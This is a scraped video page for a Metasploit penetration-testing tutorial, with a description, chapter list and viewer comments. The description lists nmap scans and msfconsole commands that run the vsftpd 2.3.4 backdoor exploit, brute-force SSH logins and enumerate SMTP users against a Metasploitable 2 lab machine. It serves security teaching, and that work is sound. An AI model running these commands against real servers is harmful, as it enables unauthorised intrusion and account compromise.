Servers penetration testing - Metasploit tutorial
ฝัง
- เผยแพร่เมื่อ 4 ก.ค. 2024
- All the commands shown in the video are below.
In this video I’m going to cover the first steps into linux servers penetration testing. We are going to start with reconnaissance activities using nmap. Afterwards we will scan for vulnerabilities using nuclei. Lastly, I'm going to exploit FTP, SSH, SMTP, and DNS services on this machine using the metasploit framework.
Topics covered in this video:
VSFTPD vulnerability
SSH Brute forece login
SMTP Enumerate users.
SMTP Find server version.
DNS Kaminsky Attack.
DNS cache poisoning.
0:00 Intro
0:43 Reconnaissance
4:43 Vulnerability Scanning
5:25 Exploitation: FTP
8:07 Exploitation: SSH
10:03 Exploitation: SMTP
12:09 Exploitation: DNS
Code:
nmap 192.168.1.236 redirect open-tcp.txt
wc -l open-tcp.txt
nmap -p 0-65553192.168.1.236 redirect open-tcp.txt
wc -l open-tcp.txt
sudo nmap -sT 192.168.1.236 redirect open-tcp.txt
sudo nmap -sU -T5 192.168.1.236 redirect open-udp.txt
#FTP
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOST 192.168.1.236
run
#ssh
msfconsole
use auxiliary/scanner/ssh/ssh_login
set PASS_FILE passwords.txt
set USER_FILE usernames.txt
set RHOST 192.168.1.236
run
#smtp
msfconsole
use auxiliary/scanner/smtp/smtp_version
set RHOST 192.168.1.236
run
use auxiliary/scanner/smtp/smtp_enum
set RHOST 192.168.1.236
run
Sources:
www.infosecmatter.com/metaspl...
docs.rapid7.com/metasploit/me...
nuclei.projectdiscovery.io/
nmap.org/
Content:
Scan open ports with nmap.
Scan open TCP ports with nmap.
Scan open UDP ports nmap.
Scan server for vulnerabilities using nuclei.
Exploit FTP servers using metasploit.
VSFTPD Exploit
Exploit SSH servers using metasploit.
SSH Brute forece login
Exploit SMTP servers using metasploit.
SMTP Enumerate users.
SMTP Find server version.
Exploit DNS servers using metasploit.
DNS Kaminsky Attack.
DNS cache poisoning.
Metasploitable 2 tutorial
Metasploit framework tutorial
i recently stumbled across your channel and ever since i've been hooked. keep up the good work bro. you are appreciated!
I've been following your channel since 3 week ago. Keep up the good work man!
Great content, I’m hooked this these videos. In-depth illustrations. Thank you for this
Great content ❤️ Thank you for sharing your knowledge ...keep it up Bro 🙌
Oh is very great, easily to understand, please next Advance 🙏
Well done 👍
Great content.
I just came across your channel few days ago and since then have been binge watching your videos. I was wondering if you could make a video about web application architecture, web frameworks and how they run on web servers and you know just a detailed underlying concepts that would give us a better understanding when hacking one. Thank you!
Thank you Aftab!
Yes, I'm going to diversify the content soon and there will be some web applications and cloud videos :)
I don't even care if you add ads to the download you're just such a goat
Which ads? 😅
Useful methods...
And all this knowledge is free. Thnks
I am really amazed by the knowledge you are distributing among us. I would like to request you to help me with the CompTia Security+ course and CYSA+ course if it is possible please.
nice content
Op bro
Thanks
الله ينور , احلي subscribe ليك , ربنا يبارك فيك
More Videos Plzz🥲
🙏🙏🙏🙏
hi sir windiws privilege escalation videos post it pls ... waiting you reply your clear explaion very usefull
Hello Sir, What server do you test on this video? Would you inform me please? Thank you
Is it possible to have a reverse shell with vpn or Tor?
Please make beginner to advance level practical live website hacking, live website bug hunting, live website penetration testing, live website exploitation content video series...
🙏 😊 💯✌❤💚💙💜😍😘🤝
Please make vd for advanced red team hacking for pro
When I ping the server ip it does not respond
You need to set it up first. Install metasploitable 2 and bridge the betwork of the vm so it will have a real IP on your router.
Bro pls make a discord
guilty, I feel like being honest here is going to be the most aningful.